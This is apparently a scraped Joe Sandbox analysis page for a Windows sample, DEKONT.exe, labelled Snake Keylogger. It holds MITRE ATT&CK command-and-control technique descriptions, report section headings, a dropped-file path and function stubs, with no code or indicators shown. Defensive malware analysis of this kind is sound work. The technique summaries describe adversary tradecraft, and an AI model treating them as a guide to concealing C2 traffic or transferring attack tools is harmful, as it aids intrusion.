Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DEKONT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DEKONT.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
DEKONT.exe

Function 07ABDB4C Relevance: 1.8, APIs: 1, Instructions: 325
processCOMMON

Function 07ABDB58 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Function 017FAF98 Relevance: 1.7, APIs: 1, Instructions: 230
COMMON

Function 05971EC5 Relevance: 1.7, APIs: 1, Instructions: 184
COMMON

Function 05971ED0 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Function 017F5E22 Relevance: 1.6, APIs: 1, Instructions: 150
COMMON

Function 017F3E44 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Function 017FA378 Relevance: 1.6, APIs: 1, Instructions: 124
libraryCOMMON

Function 07ABD7C8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 07ABD7D0 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Function 017FB638 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Function 017FD6D0 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Function 07ABD921 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Function 07ABD6A8 Relevance: 1.6, APIs: 1, Instructions: 106
memoryCOMMON

Function 07ABD928 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre